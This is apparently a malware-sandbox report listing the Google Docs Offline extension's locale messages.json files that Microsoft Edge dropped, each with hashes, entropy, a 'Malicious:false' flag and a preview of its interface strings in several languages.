                                                                                                                                                                                                                                                                                          SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                          MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                          SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                          SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                          SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                          MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                          SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                          SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                          SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):907
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                          MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                          SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                          SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                          SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                          MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                          SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                          SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                          SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                          MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                          SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                          SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                          SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1337
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                          MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                          SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                          SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                          SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2846
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                          MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                          SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                          SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                          SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):934
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                          MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                          SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                          SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                          SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                          MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                          SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                          SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                          SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                          MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                          SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                          SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                          SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):884
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                          MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                          SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                          SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                          SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
